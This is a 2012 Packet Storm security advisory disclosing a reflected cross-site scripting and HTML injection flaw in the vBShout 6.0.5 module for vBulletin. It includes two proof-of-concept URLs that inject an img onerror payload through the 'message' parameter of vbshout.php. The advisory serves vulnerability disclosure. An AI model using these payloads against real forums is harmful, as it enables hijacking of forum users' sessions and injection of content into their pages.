vBulletin vBShout 6.0.5 Cross Site Scripting

2012-03-24T00:00:00
ID PACKETSTORM:111160
Type packetstorm
Reporter d3v1l
Modified 2012-03-24T00:00:00

Description

                                        
                                            `###############################################################################################################  
  
  
# Title: vBulletin vBShout Module <= 6.0.5 (vbshout.php?message=) -  
Reflected Cross-Site Scripting ( XSS )  
  
# Note: HTML Injection and Redirect works too  
  
# Script Page : http://www.dragonbyte-tech.com  
  
# Date: 24-03-2012  
  
# Author : Avram Marius Gabriel (d3v1l)  
  
# RandomStorm - http://www.randomstorm.com  
  
# Tested on: Windows XP & Vista  
  
  
###############################################################################################################  
  
  
# The last version of vBulletin vBShout Module suffers from Cross-Site  
Scripting and HTML Injection  
The issue is located in Shoutbox Search Archive  
  
# POC:  
  
# http://www.site.com/vbshout.php?message="><textarea><!-- </textarea><img  
src=1  
onerror=alert("XSS")>&username=&hours=&from[month]=0&from[day]=&from[year]  
=0&end[month]=0&end[day]=&end[year]=0&chatroomid=0&orderby=DESC&perpage=5&s=&do=archive&instanceid=1  
  
  
# http://www.site.com/vbshout.php?message="><textarea><!-- </textarea><img  
src=1 onerror=alert("XSS")>&s=&do=archive&instanceid=1  
  
  
################################################################################################################  
  
  
  
# vBShout is the ideal way to keep members on your forum while they wait  
for replies to their posts.  
It can be used in many ways - as a chat room for members, for staff to  
discuss issues in realtime,  
as a live-update feed of new posts and threads, as a way to track member  
milestones  
  
################################################################################################################  
  
--   
Check My Blog <http://security-sh3ll.blogspot.com> or Follow me on  
Twitter<http://twitter.com/securityshell>  
`